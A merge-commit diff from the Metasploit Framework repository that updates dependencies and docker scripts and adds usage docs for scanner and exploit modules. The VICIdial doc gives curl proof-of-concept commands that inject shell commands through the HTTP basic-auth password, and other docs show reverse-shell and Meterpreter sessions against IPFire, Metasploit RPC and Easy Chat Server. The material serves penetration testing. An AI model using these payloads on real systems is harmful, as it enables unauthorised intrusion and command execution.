Merge branch 'master' into land-8716

bug/bundler_fix
Brent Cook 2017-07-24 05:51:44 -07:00
commit 838b066abe
112 changed files with 2091 additions and 902 deletions

View File

@ -16,8 +16,6 @@ rvm:
- '2.4.1'
env:
# TODO: restore these tests when the code passes them!
# - CMD='bundle exec rake cucumber cucumber:boot CREATE_BINSTUBS=true'
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'

16
Gemfile
View File

@ -3,6 +3,14 @@ source 'https://rubygems.org'
# spec.add_runtime_dependency '<name>', [<version requirements>]
gemspec name: 'metasploit-framework'
# These pull in pre-release gems in order to fix specific issues.
# XXX https://github.com/alexdalitz/dnsruby/pull/134
gem 'dnsruby', git: 'https://github.com/alexdalitz/dnsruby'
# XXX https://github.com/ConnorAtherton/rb-readline/commit/fd882edcd145c26681f9971be5f6675c7f6d1970
gem 'rb-readline', git: 'https://github.com/ConnorAtherton/rb-readline' if [
'x86_64-linux', 'x86-linux', 'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
# separate from test as simplecov is not run on travis-ci
group :coverage do
# code coverage for tests
@ -37,14 +45,6 @@ group :development, :test do
end
group :test do
# cucumber extension for testing command line applications, like msfconsole
gem 'aruba'
# cucumber + automatic database cleaning with database_cleaner
gem 'cucumber-rails', :require => false
gem 'shoulda-matchers'
# Manipulate Time.now in specs
gem 'timecop'
# Needed to work around a regression between capybara 2.7.1 and xpath 2.1
# XXX remove when capybara is updated to work with xpath 2.1
gem 'xpath', '2.0'
end

View File

@ -1,7 +1,19 @@
GIT
remote: https://github.com/ConnorAtherton/rb-readline
revision: fd882edcd145c26681f9971be5f6675c7f6d1970
specs:
rb-readline (0.5.4)
GIT
remote: https://github.com/alexdalitz/dnsruby
revision: 09c3890ccfaedb7fd4951f56575d5c53651e0140
specs:
dnsruby (1.60.1)
PATH
remote: .
specs:
metasploit-framework (4.15.1)
metasploit-framework (4.15.4)
actionpack (~> 4.2.6)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@ -16,9 +28,9 @@ PATH
metasploit-concern
metasploit-credential
metasploit-model
metasploit-payloads (= 1.2.37)
metasploit-payloads (= 1.2.42)
metasploit_data_models
metasploit_payloads-mettle (= 0.1.10)
metasploit_payloads-mettle (= 0.1.14)
msgpack
nessus_rest
net-ssh
@ -46,7 +58,7 @@ PATH
rex-mime
rex-nop
rex-ole
rex-powershell
rex-powershell (< 0.1.73)
rex-random_identifier
rex-registry
rex-rop_builder
@ -102,48 +114,13 @@ GEM
arel (6.0.4)
arel-helpers (2.4.0)
activerecord (>= 3.1.0, < 6)
aruba (0.14.2)
childprocess (~> 0.5.6)
contracts (~> 0.9)
cucumber (>= 1.3.19)
ffi (~> 1.9.10)
rspec-expectations (>= 2.99)
thor (~> 0.19)
backports (3.8.0)
bcrypt (3.1.11)
bindata (2.4.0)
bit-struct (0.16)
builder (3.2.3)
capybara (2.14.4)
addressable
mime-types (>= 1.16)
nokogiri (>= 1.3.3)
rack (>= 1.0.0)
rack-test (>= 0.5.4)
xpath (~> 2.0)
childprocess (0.5.9)
ffi (~> 1.0, >= 1.0.11)
coderay (1.1.1)
contracts (0.16.0)
cucumber (2.4.0)
builder (>= 2.1.2)
cucumber-core (~> 1.5.0)
cucumber-wire (~> 0.0.1)
diff-lcs (>= 1.1.3)
gherkin (~> 4.0)
multi_json (>= 1.7.5, < 2.0)
multi_test (>= 0.1.2)
cucumber-core (1.5.0)
gherkin (~> 4.0)
cucumber-rails (1.5.0)
capybara (>= 1.1.2, < 3)
cucumber (>= 1.3.8, < 4)
mime-types (>= 1.17, < 4)
nokogiri (~> 1.5)
railties (>= 4, < 5.2)
cucumber-wire (0.0.1)
diff-lcs (1.3)
dnsruby (1.60.1)
docile (1.1.5)
erubis (2.7.0)
factory_girl (4.8.0)
@ -151,15 +128,13 @@ GEM
factory_girl_rails (4.8.0)
factory_girl (~> 4.8.0)
railties (>= 3.0.0)
faraday (0.12.1)
faraday (0.12.2)
multipart-post (>= 1.2, < 3)
ffi (1.9.18)
filesize (0.1.1)
fivemat (1.3.5)
gherkin (4.1.3)
google-protobuf (3.3.0)
googleauth (0.5.1)
faraday (~> 0.9)
googleauth (0.5.2)
faraday (~> 0.12)
jwt (~> 1.4)
logging (~> 2.0)
memoist (~> 0.12)
@ -203,7 +178,7 @@ GEM
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-payloads (1.2.37)
metasploit-payloads (1.2.42)
metasploit_data_models (2.0.15)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@ -214,16 +189,12 @@ GEM
postgres_ext
railties (~> 4.2.6)
recog (~> 2.0)
metasploit_payloads-mettle (0.1.10)
metasploit_payloads-mettle (0.1.14)
method_source (0.8.2)
mime-types (3.1)
mime-types-data (~> 3.2015)
mime-types-data (3.2016.0521)
mini_portile2 (2.2.0)
minitest (5.10.2)
minitest (5.10.3)
msgpack (1.1.0)
multi_json (1.12.1)
multi_test (0.1.2)
multipart-post (2.0.0)
nessus_rest (0.1.6)
net-ssh (4.1.0)
@ -274,7 +245,6 @@ GEM
rake (>= 0.8.7)
thor (>= 0.18.1, < 2.0)
rake (12.0.0)
rb-readline (0.5.4)
recog (2.1.11)
nokogiri
redcarpet (3.4.0)
@ -286,7 +256,7 @@ GEM
rex-core
rex-struct2
rex-text
rex-core (0.1.11)
rex-core (0.1.12)
rex-encoder (0.1.4)
metasm
rex-arch
@ -358,8 +328,6 @@ GEM
sawyer (0.8.1)
addressable (>= 2.3.5, < 2.6)
faraday (~> 0.8, < 1.0)
shoulda-matchers (3.1.2)
activesupport (>= 4.0.0)
signet (0.7.3)
addressable (~> 2.3)
faraday (~> 0.9)
@ -386,16 +354,13 @@ GEM
activemodel (>= 4.2.7)
activesupport (>= 4.2.7)
xmlrpc (0.3.0)
xpath (2.0.0)
nokogiri (~> 1.3)
yard (0.9.9)
PLATFORMS
ruby
DEPENDENCIES
aruba
cucumber-rails
dnsruby!
factory_girl_rails
fivemat
metasploit-aggregator
@ -403,14 +368,13 @@ DEPENDENCIES
octokit
pry
rake
rb-readline!
redcarpet
rspec-rails
rspec-rerun
shoulda-matchers
simplecov
timecop
xpath (= 2.0)
yard
BUNDLED WITH
1.15.1
1.15.3

View File

@ -1,71 +1,62 @@
This file is auto-generated by tools/dev/update_gem_licenses.sh
actionpack, 4.2.8, MIT
actionview, 4.2.8, MIT
activemodel, 4.2.8, MIT
activerecord, 4.2.8, MIT
activesupport, 4.2.8, MIT
Ascii85, 1.0.2, MIT
actionpack, 4.2.9, MIT
actionview, 4.2.9, MIT
activemodel, 4.2.9, MIT
activerecord, 4.2.9, MIT
activesupport, 4.2.9, MIT
addressable, 2.5.1, "Apache 2.0"
afm, 0.2.2, MIT
arel, 6.0.4, MIT
arel-helpers, 2.4.0, unknown
aruba, 0.14.2, MIT
backports, 3.8.0, MIT
bcrypt, 3.1.11, MIT
bindata, 2.4.0, ruby
bit-struct, 0.16, ruby
builder, 3.2.3, MIT
bundler, 1.15.0, MIT
capybara, 2.14.0, MIT
childprocess, 0.5.9, MIT
bundler, 1.15.1, MIT
coderay, 1.1.1, MIT
contracts, 0.16.0, "Simplified BSD"
cucumber, 2.4.0, MIT
cucumber-core, 1.5.0, MIT
cucumber-rails, 1.5.0, MIT
cucumber-wire, 0.0.1, MIT
diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
dnsruby, 1.60.1, "Apache 2.0"
docile, 1.1.5, MIT
erubis, 2.7.0, MIT
factory_girl, 4.8.0, MIT
factory_girl_rails, 4.8.0, MIT
faraday, 0.12.1, MIT
ffi, 1.9.18, "New BSD"
filesize, 0.1.1, MIT
fivemat, 1.3.3, MIT
gherkin, 4.1.3, MIT
fivemat, 1.3.5, MIT
google-protobuf, 3.3.0, "New BSD"
googleauth, 0.5.1, "Apache 2.0"
grpc, 1.3.4, "New BSD"
i18n, 0.8.1, MIT
grpc, 1.4.1, "New BSD"
hashery, 2.1.2, "Simplified BSD"
i18n, 0.8.6, MIT
jsobfu, 0.4.2, "New BSD"
json, 2.1.0, ruby
jwt, 1.5.6, MIT
little-plugger, 1.1.4, MIT
logging, 2.2.2, MIT
loofah, 2.0.3, MIT
memoist, 0.15.0, MIT
memoist, 0.16.0, MIT
metasm, 1.0.3, LGPL
metasploit-aggregator, 0.2.1, "New BSD"
metasploit-concern, 2.0.4, "New BSD"
metasploit-credential, 2.0.9, "New BSD"
metasploit-framework, 4.14.23, "New BSD"
metasploit-concern, 2.0.5, "New BSD"
metasploit-credential, 2.0.10, "New BSD"
metasploit-framework, 4.15.0, "New BSD"
metasploit-model, 2.0.4, "New BSD"
metasploit-payloads, 1.2.29, "3-clause (or ""modified"") BSD"
metasploit_data_models, 2.0.14, "New BSD"
metasploit_payloads-mettle, 0.1.9, "3-clause (or ""modified"") BSD"
metasploit-payloads, 1.2.37, "3-clause (or ""modified"") BSD"
metasploit_data_models, 2.0.15, "New BSD"
metasploit_payloads-mettle, 0.1.10, "3-clause (or ""modified"") BSD"
method_source, 0.8.2, MIT
mime-types, 3.1, MIT
mime-types-data, 3.2016.0521, MIT
mini_portile2, 2.1.0, MIT
mini_portile2, 2.2.0, MIT
minitest, 5.10.2, MIT
msgpack, 1.1.0, "Apache 2.0"
multi_json, 1.12.1, MIT
multi_test, 0.1.2, MIT
multipart-post, 2.0.0, MIT
nessus_rest, 0.1.6, MIT
net-ssh, 4.1.0, MIT
network_interface, 0.0.1, MIT
nexpose, 6.0.0, BSD
nokogiri, 1.7.2, MIT
nexpose, 6.1.0, BSD
nokogiri, 1.8.0, MIT
octokit, 4.7.0, MIT
openssl-ccm, 1.2.1, MIT
openvas-omp, 0.0.4, MIT
@ -73,6 +64,7 @@ os, 0.9.6, MIT
packetfu, 1.1.13, BSD
patch_finder, 1.0.2, "New BSD"
pcaprub, 0.12.4, LGPL-2.1
pdf-reader, 2.0.0, MIT
pg, 0.20.0, "New BSD"
pg_array_parser, 0.0.9, unknown
postgres_ext, 3.0.0, MIT
@ -83,14 +75,14 @@ rack-test, 0.6.3, MIT
rails-deprecated_sanitizer, 1.0.3, MIT
rails-dom-testing, 1.0.8, MIT
rails-html-sanitizer, 1.0.3, MIT
railties, 4.2.8, MIT
railties, 4.2.9, MIT
rake, 12.0.0, MIT
rb-readline, 0.5.4, BSD
recog, 2.1.8, unknown
recog, 2.1.11, unknown
redcarpet, 3.4.0, MIT
rex-arch, 0.1.4, "New BSD"
rex-bin_tools, 0.1.3, "New BSD"
rex-core, 0.1.10, "New BSD"
rex-arch, 0.1.9, "New BSD"
rex-bin_tools, 0.1.4, "New BSD"
rex-core, 0.1.11, "New BSD"
rex-encoder, 0.1.4, "New BSD"
rex-exploitation, 0.1.14, "New BSD"
rex-java, 0.1.5, "New BSD"
@ -101,23 +93,25 @@ rex-powershell, 0.1.72, "New BSD"
rex-random_identifier, 0.1.2, "New BSD"
rex-registry, 0.1.3, "New BSD"
rex-rop_builder, 0.1.3, "New BSD"
rex-socket, 0.1.6, "New BSD"
rex-socket, 0.1.8, "New BSD"
rex-sslscan, 0.1.4, "New BSD"
rex-struct2, 0.1.2, "New BSD"
rex-text, 0.2.15, "New BSD"
rex-zip, 0.1.3, "New BSD"
rkelly-remix, 0.0.7, MIT
robots, 0.10.1, MIT
rspec, 3.6.0, MIT
rspec-core, 3.6.0, MIT
rspec-expectations, 3.6.0, MIT
rspec-mocks, 3.6.0, MIT
rspec-rails, 3.6.0, MIT
rspec-rerun, 1.1.0, MIT
rspec-support, 3.6.0, MIT
ruby_smb, 0.0.17, "New BSD"
ruby-rc4, 0.1.5, MIT
ruby_smb, 0.0.18, "New BSD"
rubyntlm, 0.6.2, MIT
rubyzip, 1.2.1, "Simplified BSD"
sawyer, 0.8.1, MIT
shoulda-matchers, 3.1.1, MIT
signet, 0.7.3, "Apache 2.0"
simplecov, 0.14.1, MIT
simplecov-html, 0.10.1, MIT
@ -126,10 +120,11 @@ sqlite3, 1.3.13, "New BSD"
sshkey, 1.9.0, MIT
thor, 0.19.4, MIT
thread_safe, 0.3.6, "Apache 2.0"
timecop, 0.8.1, MIT
timecop, 0.9.1, MIT
ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
tzinfo, 1.2.3, MIT
tzinfo-data, 1.2017.2, MIT
windows_error, 0.1.2, BSD
xdr, 2.0.0, "Apache 2.0"
xmlrpc, 0.3.0, ruby
xpath, 2.1.0, MIT
yard, 0.9.9, MIT

View File

@ -14,8 +14,7 @@ New bugs and feature requests should be directed to:
API documentation for writing modules can be found at:
https://rapid7.github.io/metasploit-framework/api
Questions and suggestions can be sent to:
https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list
Installing
--

View File

@ -24,7 +24,6 @@ RUN apk update && \
bison \
build-base \
ruby-dev \
libffi-dev\
openssl-dev \
readline-dev \
sqlite-dev \
@ -35,6 +34,7 @@ RUN apk update && \
yaml-dev \
zlib-dev \
ncurses-dev \
git \
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
&& bundle install --system $BUNDLER_ARGS \
&& apk del .ruby-builddeps \

View File

@ -17,5 +17,9 @@ if [[ -z "$MSF_PATH" ]]; then
MSF_PATH=$(dirname $(dirname $path))
fi
if [[ -n "$MSF_BUILD" ]]; then
docker-compose -f $MSF_PATH/docker-compose.yml build
fi
cd $MSF_PATH
docker-compose run --rm --service-ports ms ./msfvenom "$@"

26
docker/bin/msfvenom-dev Executable file
View File

@ -0,0 +1,26 @@
#! /bin/bash
if [[ -z "$MSF_PATH" ]]; then
path=`dirname $0`
# check for ./docker/msfconsole.rc
if [[ ! -f $path/../msfconsole.rc ]] ; then
# we are not inside the project
realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;}
# determine script path
pushd $(dirname $(realpath $0)) > /dev/null
path=$(pwd)
popd > /dev/null
fi
MSF_PATH=$(dirname $(dirname $path))
fi
cd $MSF_PATH
if [[ -n "$MSF_BUILD" ]]; then
docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml build
fi
docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml run --rm --service-ports ms ./msfvenom "$@"

View File

@ -0,0 +1,66 @@
## Vulnerable Application
Any system exposing the remote desktop protocol, RDP, typically on 3389/TCP.
## Verification Steps
1. Do: ```use auxiliary/scanner/rdp/rdp_scanner```
2. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of RDP
3. Do: ```run```
4. If the host is exposing an identifiable RDP instance, it will print the endpoint.
## Options
There are three options currently supported that control what security protocols to
send in the RDP negotiation request, which can be helpful in identifying RDP
endpoints that might be locked down or configured differently:
**TLS** Set to true to request TLS security support
**CredSSP** Set to true to request CredSSP support
**EarlyUser** Set to true to request Early User Authorization Result PDU support
## Scenarios
```
msf auxiliary(rdp_scanner) > run
[+] 10.4.18.26:3389 - Identified RDP
[+] 10.4.18.22:3389 - Identified RDP
[+] 10.4.18.89:3389 - Identified RDP
[+] 10.4.18.9:3389 - Identified RDP
[+] 10.4.18.67:3389 - Identified RDP
[+] 10.4.18.80:3389 - Identified RDP
[+] 10.4.18.34:3389 - Identified RDP
[+] 10.4.18.70:3389 - Identified RDP
[+] 10.4.18.30:3389 - Identified RDP
[+] 10.4.18.76:3389 - Identified RDP
[+] 10.4.18.13:3389 - Identified RDP
[+] 10.4.18.91:3389 - Identified RDP
[+] 10.4.18.5:3389 - Identified RDP
[+] 10.4.18.47:3389 - Identified RDP
[+] 10.4.18.41:3389 - Identified RDP
[+] 10.4.18.105:3389 - Identified RDP
[*] Scanned 44 of 256 hosts (17% complete)
[*] Scanned 55 of 256 hosts (21% complete)
[+] 10.4.18.118:3389 - Identified RDP
[+] 10.4.18.108:3389 - Identified RDP
[+] 10.4.18.139:3389 - Identified RDP
[*] Scanned 94 of 256 hosts (36% complete)
[*] Scanned 110 of 256 hosts (42% complete)
[+] 10.4.18.157:3389 - Identified RDP
[+] 10.4.18.166:3389 - Identified RDP
[+] 10.4.18.164:3389 - Identified RDP
[+] 10.4.18.170:3389 - Identified RDP
[+] 10.4.18.185:3389 - Identified RDP
[+] 10.4.18.209:3389 - Identified RDP
[+] 10.4.18.188:3389 - Identified RDP
[*] Scanned 156 of 256 hosts (60% complete)
[+] 10.4.18.237:3389 - Identified RDP
[+] 10.4.18.225:3389 - Identified RDP
[*] Scanned 186 of 256 hosts (72% complete)
[*] Scanned 194 of 256 hosts (75% complete)
[*] Scanned 208 of 256 hosts (81% complete)
[*] Scanned 253 of 256 hosts (98% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
```

View File

@ -0,0 +1,48 @@
## Vulnerable Application
Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso)
This module has been verified against:
1. 2.19 core 100
2. 2.19 core 110 (exploit-db, not metasploit module)
## Verification Steps
1. Install the firewall
2. Start msfconsole
3. Do: ```use exploit/linux/http/ipfire_oinkcode_exec```
4. Do: ```set password admin``` or whatever it was set to at install
5. Do: ```set rhost 10.10.10.10```
6. Do: ```set payload cmd/unix/reverse_perl```
7. Do: ```set lhost 192.168.2.229```
8. Do: ```exploit```
9. You should get a shell.
## Options
**PASSWORD**
Password is set at install. May be blank, 'admin', or 'ipfire'.
## Scenarios
```
msf > use exploit/linux/http/ipfire_oinkcode_exec
msf exploit(ipfire_oinkcode_exec) > set password admin
password => admin
msf exploit(ipfire_oinkcode_exec) > set rhost 192.168.2.201
rhost => 192.168.2.201
msf exploit(ipfire_oinkcode_exec) > set verbose true
verbose => true
msf exploit(ipfire_oinkcode_exec) > check
[*] 192.168.2.201:444 The target appears to be vulnerable.
msf exploit(ipfire_oinkcode_exec) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.201:38412) at 2017-06-14 21:12:21 -0400
id
uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
whoami
nobody
```

View File

@ -0,0 +1,142 @@
## Description
This module connects to a specified Metasploit RPC server and uses the *console.write* procedure to execute operating system commands. Valid credentials are required to access the RPC interface.
## Vulnerable Application
[Metasploit](https://www.rapid7.com/products/metasploit/) is the world's most used penetration testing software. The RPC API can be used to programmatically drive the Metasploit Framework and Metasploit Pro products.
To start the RPC service, run `msfrpcd -U msf -P abc123`; or run `load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=msf Pass=abc123 SSL=Y` from within msfconsole.
This module has been tested successfully on:
* Metasploit 4.15 on Kali 1.0.6
* Metasploit 4.14 on Kali 2017.1
* Metasploit 4.14 on Windows 7 SP1
Source and Installers:
* [Source Code Repository](https://github.com/rapid7/metasploit-framework)
* [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploit/multi/misc/msf_rpc_console`
3. Do: `set RHOST [IP]`
4. Do: `set RPORT [PORT]` (default: `55552`)
5. Do: `set USERNAME [USERNAME]` (default: `msf`)
6. Do: `set PASSWORD [PASSWORD]`
7. Do: `set LHOST [IP]`
8. Do: `run`
9. You should get a session
## Options
**Username**
The username for Metasploit RPC (default: `msf`).
**Password**
The password for the RPC user.
## Scenarios
### Ruby Target
```
msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(msf_rpc_console) > set username msf
username => msf
msf exploit(msf_rpc_console) > set password abc123
password => abc123
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(msf_rpc_console) > set target 0
target => 0
msf exploit(msf_rpc_console) > run
[*] Started reverse TCP handler on 172.16.191.181:4444
[+] 172.16.191.166:55552 - Authenticated successfully
[*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
[*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
[*] 172.16.191.166:55552 - API version 1.0
[+] 172.16.191.166:55552 - Created console #0
[*] 172.16.191.166:55552 - Sending payload...
[*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.166:52984) at 2017-07-05 03:40:50 -0400
whoami
win-sgbsd5tqutq\user
```
### Windows CMD Target
```
msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(msf_rpc_console) > set username msf
username => msf
msf exploit(msf_rpc_console) > set password abc123
password => abc123
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(msf_rpc_console) > set target 0
target => 1
msf exploit(msf_rpc_console) > set payload cmd/windows/powershell_reverse_tcp
payload => cmd/windows/powershell_reverse_tcp
msf exploit(msf_rpc_console) > run
[*] Started reverse SSL handler on 172.16.191.181:4444
[+] 172.16.191.166:55552 - Authenticated successfully
[*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
[*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
[*] 172.16.191.166:55552 - API version 1.0
[+] 172.16.191.166:55552 - Created console #1
[*] 172.16.191.166:55552 - Sending payload...
[*] Powershell session session 2 opened (172.16.191.181:4444 -> 172.16.191.166:52996) at 2017-07-05 03:44:05 -0400
Windows PowerShell running as user user on WIN-SGBSD5TQUTQ
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\metasploit>whoami
win-sgbsd5tqutq\user
```
### Unix CMD Target
```
msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.215
rhost => 172.16.191.215
msf exploit(msf_rpc_console) > set username msf
username => msf
msf exploit(msf_rpc_console) > set password abc123
password => abc123
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(msf_rpc_console) > set target 2
target => 2
msf exploit(msf_rpc_console) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf exploit(msf_rpc_console) > run
[*] Started reverse TCP handler on 172.16.191.181:4444
[+] 172.16.191.215:55552 - Authenticated successfully
[*] 172.16.191.215:55552 - Metasploit 4.15.0-dev-aceeedc
[*] 172.16.191.215:55552 - Ruby 2.3.0 x86_64-linux 2015-12-25
[*] 172.16.191.215:55552 - API version 1.0
[+] 172.16.191.215:55552 - Created console #0
[*] 172.16.191.215:55552 - Sending payload...
[*] Command shell session 3 opened (172.16.191.181:4444 -> 172.16.191.215:40768) at 2017-07-05 03:46:11 -0400
id
uid=0(root) gid=0(root) groups=0(root)
```

View File

@ -0,0 +1,133 @@
## Description
This module exploits a vulnerability in VICIdial versions 2.9 RC1 to 2.13 RC1 which allows unauthenticated users to execute arbitrary operating system commands as the web server user if password encryption is enabled (disabled by default).
When password encryption is enabled the user's password supplied using HTTP basic authentication is used in a call to `exec()`.
This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS.
## Vulnerable Application
VICIDIAL is a software suite that is designed to interact with the Asterisk Open-Source PBX Phone system to act as a complete inbound/outbound contact center suite with inbound email support as well.
This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS.
Installers:
* [VICIdial 2.11 RC1](https://sourceforge.net/projects/astguiclient/files/astguiclient_2.11rc1.zip/download)
* [VICIdial 2.13 RC1](https://sourceforge.net/projects/astguiclient/files/astguiclient_2.13rc1.zip/download)
Follow the [instructions to enabled password encryption](http://vicidial.org/docs/ENCRYPTED_PASSWORDS.txt).
## Technical Details
The `functions.php` file defines a function called `user_authorization`:
```php
function user_authorization($user,$pass,$user_option,$user_update)
```
This function is used throughout the application to validate user logon credentials supplied using HTTP basic authentication. If password encryption is enabled the user's password is passed to the `pass` argument of the `bp.pl` Perl script, without quotes, using PHP's `exec()` function:
```php
if ($SSpass_hash_enabled > 0)
{
if (file_exists("../agc/bp.pl"))
{$pass_hash = exec("../agc/bp.pl --pass=$pass");}
else
{$pass_hash = exec("../../agc/bp.pl --pass=$pass");}
```
A rudimentary blacklist is used to prevent command injection. The apostrophe `'`, quote `"`, semi-colon `;` and backslash `\` characters are removed from the user's username and password using `preg_replace`, like so:
```php
$user = preg_replace("/\'|\"|\\\\|;/","",$user);
$pass = preg_replace("/\'|\"|\\\\|;/","",$pass);
```
It is trivial to bypass the blacklist.
For example, backticks ``` ` ```, pipe `|` or ampersand `&` are sufficient to bypass the blacklist and execute arbitrary operating system commands.
For the purposes of exploitation, reaching the `user_authorization` function call with malicious input is hindered by additional input validation in use prior to the authentication check throughout the majority of the codebase:
```php
$PHP_AUTH_USER = preg_replace('/[^-_0-9a-zA-Z]/', '', $PHP_AUTH_USER);
$PHP_AUTH_PW = preg_replace('/[^-_0-9a-zA-Z]/', '', $PHP_AUTH_PW);
```
However, in VICIdial version 2.11RC2, at least two files did not make use of the additional validation:
* help.php
* vicidial_sales_viewer.php
In VICIdial version 2.13RC1, at least one file did not make use of the additional validation:
* vicidial_sales_viewer.php
This vulnerability was patched in revision 2759.
## Proof of Concept
```bash
$ curl -isk "https://VICIdial.local/vicidial/vicidial_sales_viewer.php" \
--user 'anyusername:anypassword& id>/tmp/pwned_by_sales_viewer #'
```
```bash
$ curl -isk "https://VICIdial.local/vicidial/help.php" \
--user 'anyusername:anypassword& id>/tmp/pwned_by_help #'
```
Note that `/tmp/pwned_by_help` and `/tmp/pwned_by_sales_viewer` files should contain the results of the `id` command.
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec`
3. Do: `set rhost [IP]`
4. Do: `run`
5. You should get a session
## Sample Output
```
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check
[*] 172.16.191.150:80 The target appears to be vulnerable.
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run
[*] Started reverse TCP handler on 172.16.191.181:4444
[*] 172.16.191.150:80 Sending payload (505 bytes)
[+] 172.16.191.150:80 Payload sent successfully
[*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.150:36660) at 2017-05-27 01:00:41 -0400
id
uid=48(apache) gid=48(apache) groups=48(apache)
```
## Sample Output (Verbose)
```
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > set verbose true
verbose => true
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check
[*] 172.16.191.150:80 Password encryption is supported, but may not be enabled.
[*] 172.16.191.150:80 The target appears to be vulnerable.
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run
[*] Started reverse TCP handler on 172.16.191.181:4444
[*] 172.16.191.150:80 Sending payload (505 bytes)
[+] 172.16.191.150:80 Payload sent successfully
[*] Command shell session 2 opened (172.16.191.181:4444 -> 172.16.191.150:36661) at 2017-05-27 01:00:48 -0400
id
uid=48(apache) gid=48(apache) groups=48(apache)
```

View File

@ -0,0 +1,53 @@
## Description
This module exploits a vulnerability in the EFS Easy Chat Server application versions 2 through 3.1. The username parameter in the Registration page 'register.php', which is prone to a stack overflow vulnerability.
This module allows a remote attacker to execute a payload under the context of the user running the Easy Chat Server application
## Vulnerable Application
[Easy Chat Server](http://echatserver.com/) Easy Chat Server is an easy, fast and affordable way to host and manage real-time communication software.
This module has been tested successfully on
* Easy Chat Server 3.1 on Windows XP En SP3
Installers:
[EFS Easy Chat Server Installers](http://echatserver.com/ecssetup.exe)
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploits/windows/http/easychatserver_seh`
3. Do: `set rhosts [IP]`
4. Do: `exploit`
5. You should get your payload executed
## Scenarios
```
marco@kali:~$ msfconsole -q
msf > use exploit/windows/http/easychatserver_seh
msf exploit(easychatserver_seh) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(easychatserver_seh) > exploit
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Sending stage (957487 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200
meterpreter > sysinfo
Computer : MM-8B040C5B05D9
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit
msf exploit(easychatserver_seh) >
```

View File

@ -1,8 +1,8 @@
## Description
This module exploits a vulnerability in the Easy File Sharing Web Server application, by exploiting an overflow in the Email Post parameter, through DEP bypass via ROP chain.
This module exploits a vulnerability in the Easy File Sharing Web Server application. It uses an overflow in the Email Post parameter, bypassing DEP via a ROP chain.
This module allows a remote attacker to get a payload executed under the context of the user running the Easy File Sharing application
This module allows a remote attacker to execute a payload under the context of the user running the Easy File Sharing application
## Vulnerable Application
@ -10,7 +10,7 @@ This module allows a remote attacker to get a payload executed under the context
This module has been tested successfully on
* Easy File Sharing 7.2 on Windows XP En Sp3
* Easy File Sharing 7.2 on Windows XP En Sp3
Installers:
@ -18,11 +18,11 @@ Installers:
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploits/windows/http/easyfilesharing_post`
3. Do: `set rhosts [IP]`
4. Do: `exploit`
5. You should get your payload executed
1. Start `msfconsole`
2. Do: `use exploits/windows/http/easyfilesharing_post`
3. Do: `set rhosts [IP]`
4. Do: `exploit`
5. You should get your payload executed
## Scenarios
@ -32,11 +32,11 @@ msf > use exploit/windows/http/easyfilesharing_post
